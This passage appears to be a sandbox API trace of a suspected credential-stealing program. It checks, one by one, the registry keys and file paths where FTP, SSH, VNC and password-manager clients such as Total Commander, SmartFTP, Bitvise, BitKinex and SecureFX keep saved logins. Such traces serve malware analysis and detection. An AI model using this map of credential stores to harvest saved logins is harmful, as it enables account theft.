[0114.696] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104) returned 0x2 [0114.696] GetProcessHeap () returned 0x5b0000 [0114.697] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.697] GetProcessHeap () returned 0x5b0000 [0114.697] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.697] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.698] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.698] GetProcessHeap () returned 0x5b0000 [0114.698] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f56) returned 0x5cb930 [0114.699] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.699] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\SmartFTP", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0114.699] GetProcessHeap () returned 0x5b0000 [0114.699] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.699] GetProcessHeap () returned 0x5b0000 [0114.700] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.701] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0114.701] GetProcessHeap () returned 0x5b0000 [0114.701] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.701] GetProcessHeap () returned 0x5b0000 [0114.702] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.702] GetProcessHeap () returned 0x5b0000 [0114.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.702] GetProcessHeap () returned 0x5b0000 [0114.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc158 [0114.702] GetProcessHeap () returned 0x5b0000 [0114.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca980 [0114.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.703] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x5ca980 | out: phkResult=0x5ca980*=0x0) returned 0x2 [0114.703] GetProcessHeap () returned 0x5b0000 [0114.703] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca980 | out: hHeap=0x5b0000) returned 1 [0114.703] GetProcessHeap () returned 0x5b0000 [0114.704] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0114.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.705] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x5ca8f0 | out: phkResult=0x5ca8f0*=0x0) returned 0x2 [0114.705] GetProcessHeap () returned 0x5b0000 [0114.705] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0114.705] GetProcessHeap () returned 0x5b0000 [0114.706] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.706] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc158 | out: hHeap=0x5b0000) returned 1 [0114.706] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3fd4) returned 0x5cb930 [0114.706] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.709] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0114.709] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xde) returned 0x5c9390 [0114.710] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.711] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0114.712] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.712] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.712] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.713] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0114.714] Sleep (dwMilliseconds=0xa) [0114.740] GetProcessHeap () returned 0x5b0000 [0114.740] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.740] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.741] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0114.741] GetProcessHeap () returned 0x5b0000 [0114.741] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4e) returned 0x5caae8 [0114.741] GetProcessHeap () returned 0x5b0000 [0114.742] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.742] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.tlp"), lpFindFileData=0xdf920 | out: lpFindFileData=0xdf920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5b7670, nFileSizeHigh=0x5bb890, nFileSizeLow=0x5bbb80, dwReserved0=0x0, dwReserved1=0xdf97c, cFileName="ը眠", cAlternateFileName="뒭蕬͈읩맼ィﮄ\r䂑@")) returned 0xffffffff [0114.743] GetProcessHeap () returned 0x5b0000 [0114.743] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.743] GetProcessHeap () returned 0x5b0000 [0114.743] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.743] GetProcessHeap () returned 0x5b0000 [0114.743] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.744] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.745] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0114.746] Sleep (dwMilliseconds=0xa) [0114.772] GetProcessHeap () returned 0x5b0000 [0114.772] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.773] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.773] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0114.773] GetProcessHeap () returned 0x5b0000 [0114.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x50) returned 0x5caae8 [0114.773] GetProcessHeap () returned 0x5b0000 [0114.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.775] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.bscp"), lpFindFileData=0xdf908 | out: lpFindFileData=0xdf908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5b7670, nFileSizeHigh=0x5bb890, nFileSizeLow=0x5bbd78, dwReserved0=0x0, dwReserved1=0xdf964, cFileName="ը眠", cAlternateFileName="뒭蕬͈읩맄ィﭬ\r䂑@")) returned 0xffffffff [0114.775] GetProcessHeap () returned 0x5b0000 [0114.775] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.775] GetProcessHeap () returned 0x5b0000 [0114.776] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.776] GetProcessHeap () returned 0x5b0000 [0114.776] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.777] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104) returned 0x2 [0114.777] GetProcessHeap () returned 0x5b0000 [0114.777] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.777] GetProcessHeap () returned 0x5b0000 [0114.777] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.778] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.779] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0114.779] Sleep (dwMilliseconds=0xa) [0114.824] GetProcessHeap () returned 0x5b0000 [0114.824] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.824] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.825] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0114.825] GetProcessHeap () returned 0x5b0000 [0114.825] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4e) returned 0x5caae8 [0114.825] GetProcessHeap () returned 0x5b0000 [0114.826] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.826] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.vnc"), lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x5b7670, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5bb890, nFileSizeHigh=0x5bc048, nFileSizeLow=0x0, dwReserved0=0xdf96c, dwReserved1=0x77200568, cFileName="", cAlternateFileName="͈읩만ィ")) returned 0xffffffff [0114.827] GetProcessHeap () returned 0x5b0000 [0114.827] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.827] GetProcessHeap () returned 0x5b0000 [0114.827] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.827] GetProcessHeap () returned 0x5b0000 [0114.827] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.828] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.828] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0114.831] Sleep (dwMilliseconds=0xa) [0114.849] GetProcessHeap () returned 0x5b0000 [0114.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.849] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.850] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0114.850] GetProcessHeap () returned 0x5b0000 [0114.850] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5caba0 [0114.850] GetProcessHeap () returned 0x5b0000 [0114.851] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.851] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.vnc"), lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x5b7670, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5bb890, nFileSizeHigh=0x5bbc10, nFileSizeLow=0x0, dwReserved0=0xdf954, dwReserved1=0x77200568, cFileName="", cAlternateFileName="螚䇆맔ィ")) returned 0xffffffff [0114.852] GetProcessHeap () returned 0x5b0000 [0114.852] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.852] GetProcessHeap () returned 0x5b0000 [0114.852] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.852] GetProcessHeap () returned 0x5b0000 [0114.852] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.853] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.854] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0114.854] GetProcessHeap () returned 0x5b0000 [0114.854] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f54) returned 0x5cb930 [0114.854] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.855] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\mSecure", arglist=0xdfb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0114.855] GetProcessHeap () returned 0x5b0000 [0114.855] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x52) returned 0x5caba0 [0114.855] GetProcessHeap () returned 0x5b0000 [0114.856] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.857] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0114.857] GetProcessHeap () returned 0x5b0000 [0114.857] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.857] GetProcessHeap () returned 0x5b0000 [0114.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.858] GetProcessHeap () returned 0x5b0000 [0114.858] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.858] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.859] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\ProgramData") returned 0x0 [0114.859] GetProcessHeap () returned 0x5b0000 [0114.859] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f58) returned 0x5cb930 [0114.860] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.860] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Syncovery", arglist=0xdfb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0114.860] GetProcessHeap () returned 0x5b0000 [0114.860] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x34) returned 0x5be348 [0114.860] GetProcessHeap () returned 0x5b0000 [0114.861] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.862] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0114.862] GetProcessHeap () returned 0x5b0000 [0114.862] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.862] GetProcessHeap () returned 0x5b0000 [0114.862] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be348 | out: hHeap=0x5b0000) returned 1 [0114.862] GetProcessHeap () returned 0x5b0000 [0114.863] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.864] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.864] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.864] GetProcessHeap () returned 0x5b0000 [0114.864] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.865] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.865] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0114.865] GetProcessHeap () returned 0x5b0000 [0114.865] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5caba0 [0114.866] GetProcessHeap () returned 0x5b0000 [0114.866] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.867] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0114.867] GetProcessHeap () returned 0x5b0000 [0114.867] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.867] GetProcessHeap () returned 0x5b0000 [0114.868] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.868] GetProcessHeap () returned 0x5b0000 [0114.868] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb930 [0114.868] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.869] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0114.869] GetProcessHeap () returned 0x5b0000 [0114.869] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c7990 [0114.869] GetProcessHeap () returned 0x5b0000 [0114.870] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.871] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0114.871] GetProcessHeap () returned 0x5b0000 [0114.871] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7990 | out: hHeap=0x5b0000) returned 1 [0114.871] GetProcessHeap () returned 0x5b0000 [0114.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6a) returned 0x5cb930 [0114.872] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.873] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\UltraFXP\\sites.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0114.873] GetProcessHeap () returned 0x5b0000 [0114.873] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x74) returned 0x5c6c10 [0114.873] GetProcessHeap () returned 0x5b0000 [0114.873] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.874] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0114.874] GetProcessHeap () returned 0x5b0000 [0114.875] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6c10 | out: hHeap=0x5b0000) returned 1 [0114.875] GetProcessHeap () returned 0x5b0000 [0114.875] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f68) returned 0x5cb930 [0114.875] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.876] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTP Now\\sites.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0114.876] GetProcessHeap () returned 0x5b0000 [0114.876] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7110 [0114.876] GetProcessHeap () returned 0x5b0000 [0114.877] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.877] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0114.878] GetProcessHeap () returned 0x5b0000 [0114.878] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7110 | out: hHeap=0x5b0000) returned 1 [0114.878] GetProcessHeap () returned 0x5b0000 [0114.878] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.879] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba8*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba8*=0x104) returned 0x2 [0114.879] GetProcessHeap () returned 0x5b0000 [0114.880] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.880] GetProcessHeap () returned 0x5b0000 [0114.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.880] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.881] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.881] GetProcessHeap () returned 0x5b0000 [0114.881] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.881] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.882] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0114.882] GetProcessHeap () returned 0x5b0000 [0114.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5caba0 [0114.882] GetProcessHeap () returned 0x5b0000 [0114.883] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.884] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0114.884] GetProcessHeap () returned 0x5b0000 [0114.884] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.884] GetProcessHeap () returned 0x5b0000 [0114.884] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.885] GetProcessHeap () returned 0x5b0000 [0114.885] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.886] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.886] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.886] GetProcessHeap () returned 0x5b0000 [0114.886] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8c) returned 0x5cb930 [0114.887] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.888] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0xdfb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0114.888] GetProcessHeap () returned 0x5b0000 [0114.888] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c7a10 [0114.888] GetProcessHeap () returned 0x5b0000 [0114.889] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.891] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0114.891] GetProcessHeap () returned 0x5b0000 [0114.892] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7a10 | out: hHeap=0x5b0000) returned 1 [0114.892] GetProcessHeap () returned 0x5b0000 [0114.892] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.892] GetProcessHeap () returned 0x5b0000 [0114.892] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.892] GetProcessHeap () returned 0x5b0000 [0114.892] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0114.892] GetProcessHeap () returned 0x5b0000 [0114.892] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0114.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.893] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x5ca8b0 | 